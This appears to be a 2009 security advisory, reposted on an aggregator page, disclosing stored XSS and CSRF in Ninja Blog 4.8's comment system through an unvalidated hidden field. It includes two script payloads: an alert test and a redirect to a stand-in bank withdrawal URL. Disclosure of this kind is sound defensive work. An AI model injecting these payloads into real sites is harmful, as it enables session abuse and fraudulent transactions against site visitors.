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Ninja Blog 4.8 XSRF / XSS

🗓️ 21 Jan 2009 00:00:00Reported by Danny MoulesType 
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Ninja Blog 4.8 XSRF / XSS vulnerability in comment syste

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`Vendor: http://ninjadesigns.co.uk  
Version(s): Ninja Blog 4.8 (May also affect earlier versions)  
Credit: Danny Moules  
Critical: Yes  
  
See PUSH 55 Advisory at https://www.push55.co.uk/index.php?s=ad&id=7  
  
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Due to insufficient validation of client-side data, we can inject script directly into the file-based storage used for blog comments.  
  
When making a new comment, we simply fill the "posted" hidden field's value with...  
  
<script>alert('xss');<script>"  
  
...for an XSS attack OR...  
  
<script>window.location="http://bank.example/withdraw?account=bob&amount=1000000&for=mallory"</script>  
  
...for a CRSF attack and otherwise submit the comment as usual.  
  
Whenever that comment is viewed, the script is executed.  
  
  
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21 Jan 2009 00:00Current
0.2Low risk
Vulners AI Score0.2
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